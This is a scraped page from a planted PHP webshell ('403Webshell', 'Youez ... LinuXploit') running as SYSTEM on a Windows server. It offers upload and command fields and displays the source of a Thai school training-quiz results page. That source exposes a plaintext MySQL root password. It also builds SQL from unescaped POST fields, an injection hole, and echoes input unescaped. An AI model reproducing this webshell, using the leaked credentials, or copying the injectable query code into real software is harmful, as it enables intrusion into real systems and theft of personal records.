403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/training/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/www//training/view.php
<html>
        <?php require"header.php" ?>

<link rel="stylesheet" href="google.css"  type="text/css" />
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.12.1/css/dataTables.bootstrap5.min.css">


		<script type="text/javascript" language="javascript" src="https://code.jquery.com/jquery-3.5.1.js"></script>
<script type="text/javascript" src="https://cdn.datatables.net/1.12.1/js/jquery.dataTables.min.js"></script>
<script type="text/javascript" src="https://cdn.datatables.net/1.12.1/js/dataTables.bootstrap5.min.js"></script>

<script>
$(document).ready(function () {
    $('#example').DataTable();
});
</script>

		<body>

<?php require"navbar.php" ?>

<form name="frmSearch" method="post" action="<?php echo $_SERVER['SCRIPT_NAME'];?>">


<div class="container-xl">

<!-- <table class="table table-bordered">
  <thead>
    <tr>
      <th> --><br>
	  <h3>สรุปจำนวนผู้ผ่านการทดสอบ</h3>

	  <?php
include('db.php');
    $sql = "select * from quiz_pass";
    $result = mysqli_query($conn,$sql);
    $pass = mysqli_num_rows($result);
    $sql2 = "select * from quiz_pass where member ='สพม.ราชบุรี'";
    $result2 = mysqli_query($conn,$sql2);
    $pass2 = mysqli_num_rows($result2);
    $sql3 = "select * from quiz_pass where member ='อื่นๆ'";
    $result3 = mysqli_query($conn,$sql3);
    $pass3 = mysqli_num_rows($result3);
	?>
	ผ่านทั้งหมด <?php echo $pass; ?> คน<br/>


</td></tr></table>
<br />สังกัด
<select name="member">
	<option></option>;
<option>สพม.ราชบุรี</option>;
<option>อื่นๆ</option>;
</select>

<br /><br />โรงเรียน 

<select name="school">
<option></option>;
<option>สพม.ราชบุรี</option>;
<option>สวนผึ้งวิทยา</option>;
<option>ปากท่อพิทยาคม</option>;
<option>เบญจมราชูทิศ ราชบุรี</option>;
<option>คุรุราษฎร์รังสฤษฏ์</option>;
<option>ด่านทับตะโกราษฎร์อุปถัมภ์</option>;
<option>วัดสันติการามวิทยา ในพระบรมราชานุเคราะห์</option>;
<option>ราชโบริกานุเคราะห์</option>;
<option>แคทรายวิทยา</option>;
<option>บรมราชินีนาถราชวิทยาลัย</option>;
<option>รัฐราษฎร์อุปถัมภ์</option>;
<option>โสภณศิริราษฎร์</option>;
<option>บ้านคาวิทยา</option>;
<option>สายธรรมจันทร์</option>;
<option>โพธาวัฒนาเสนี</option>;
<option>ประสาทรัฐประชากิจ</option>;
<option>หนองปลาหมอพิทยาคม</option>;
<option>โพหัก(วงศ์สมบูรณ์ราษฎร์อุปถัมภ์)</option>;
<option>หนองโพวิทยา</option>;
<option>เตรียมอุดมศึกษาพัฒนาการ ราชบุรี</option>;
<option>ช่องพรานวิทยา</option>;
<option>เนกขัมวิทยา</option>;
<option>มัธยมวัดดอนตูม</option>;
<option>ท่ามะขามวิทยา</option>;
<option>บางแพปฐมพิทยา</option>;
<option>กรับใหญ่ว่องกุศลกิจพิทยาคม</option>;
<option>รัตนราษฎร์บำรุง</option>;
</select>


<br><br>หลักสูตร 
<select name="subject">
<option></option>;
<option>การจัดทำข้อตกลงพัฒนางาน ว PA</option>;
<option>ระบบการดูแลช่วยเหลือนักเรียน วิถีใหม่วิถีคุณภาพ</option>;
<option>หลักเกณฑ์ปฏิบัติการตรวจสอบภายในสำหรับหน่วยงานของรัฐ</option>;
<option>การขับเคลื่อนแผนการศึกษาแห่งชาติ พ.ศ. 2560 - 2579 สู่การปฏิบัติของสถานศึกษา สังกัด สพฐ.</option>;
<option>การปฏิบัติงานและการจัดทำหนังสือราชการตามระเบียบงานสารบรรณ</option>;
<option>การศึกษาต่อ ฝึกอบรม หรือปฏิบัติการวิจัย ภายในประเทศ ของข้าราชการครูและบุคลากรทางการศึกษา สังกัด สพฐ. พ.ศ. 2547 และการขออนุมัติเดินทางไปราชการ</option>;
<option>การป้องกันการทุจริตและการคิดแยกแยะระหว่างผลประโยชน์ส่วนบุคคลและผลประโยชน์ส่วนรวม</option>;
<option>พื้นฐานความรู้เกี่ยวกับการวัดการประเมินผลตามแนวทาง PISA</option>;
<option>การบริการจัดการหนี้อย่างมีประสิทธิภาพ และการเสริมสร้างวินัยทางการเงิน</option>;
<option>Digital Literacy</option>;
</select>
<br><br>
      <center><button type="submit" class="btn btn-primary">ค้นหา</button></center>
	  <!--</th>
    </tr>
  </thead>
  </table>-->
</form><br><br>
<?php
if(($_POST["school"] != "" or $_POST["subject"] != "" or $_POST["member"] != ""))
{

	$objConnect = mysql_connect("localhost","root","P@ssw0rdMySQL0") or die("Error Connect to Database");
	$objDB = mysql_select_db("quiz");
mysql_query("SET character_set_results=utf8");
mysql_query("SET character_set_client=utf8");
mysql_query("SET character_set_connection=utf8");
	// Search By Name or Email
/*	$strSQL = "SELECT * FROM quiz_pass WHERE school = '".$_POST["school"]."'";


	$strSQL = "SELECT * FROM certificate WHERE 1 ";

	if($_POST["txtKeyword"] != "")
	{
		$strSQL .= " AND name like '%".$_POST["txtKeyword"]."%' ";
	}

	if($_POST["telKeyword"] != "")
	{
		$strSQL .= " AND tel = '".$_POST["telKeyword"]."' ";
	}
*/

$strSQL = "SELECT * FROM quiz_pass WHERE 1 ";

if($_POST["school"] != "")
{
	$strSQL .= " AND school = '".$_POST["school"]."' ";
}

if($_POST["subject"] != "")
{
	$strSQL .= " AND subject = '".$_POST["subject"]."' ";
}

if($_POST["member"] != "")
{
	$strSQL .= " AND member = '".$_POST["member"]."' ";
}

	$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");

		?>

<?
if(mysql_num_rows($objQuery) <1){
?>
	<center><font size="5" color="red">ไม่พบข้อมูล!!!!</font><center></td>
<!--	<center><a href="https://docs.google.com/forms/d/e/1FAIpQLSfO1PVG7221D8VvX3ySqN178as_SB68Hasb7x0q9qnMTcpt2w/viewform?usp=sf_link" target="_blank"><font size="4" color="red">หากไม่พบชื่อ สามารถแจ้งได้ที่นี่ &nbsp;::Click Here::</font></a><center> -->
<?
}else{	
?>
<br>
สังกัด : <?php echo $_POST["member"];?><br />
โรงเรียน : <?php echo $_POST["school"];?><br />
หลักสูตร : <?php echo $_POST["subject"];?><br />
จำนวนผู้ผ่านการทดสอบ : <?php 
$num_rows = mysql_num_rows($objQuery);
echo "$num_rows คน ";
?>
<br><br>
<center>
<table id="example" class="table table-striped" style="width:100%">
	<thead>
		<tr>
		<th> <div align="center">ชื่อ - นามสกุล</div></th>
		<th> <div align="center">โรงเรียน</div></th>
		<th> <div align="center">หลักสูตร</div></th>
		<th> <div align="center">คะแนน</div></th>
		<th> <div align="center">เปอร์เซ็นต์</div></th>
	  </tr>
	</thead>
      </center>
<?php

	while($objResult = mysql_fetch_array($objQuery))
	{
	?>
	  <tr>
		<td height="40"> <div align="center"><?php echo $objResult["name"];?></div></td>
		<td height="40"> <div><?php echo $objResult["school"];?></div></td>
		<td height="40"> <div><?php echo $objResult["subject"];?></div></td>
		<td height="40"> <div align="center"><?php echo $objResult["score"];?></div></td>
		<td height="40"> <div align="center"><?php echo $objResult["percent"];?>%</div></td>

<script>
function submitForm() {
  // Can do some validation here if needed

  document.getElementById('sample_form').submit();  

  return true;
}
</script>



</form>

	  </tr>
	<?php
	}
	?>
	</table>
	<?php
	mysql_close($objConnect);

	}
}
?>

</div>

  <?php require"footer.php" ?>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit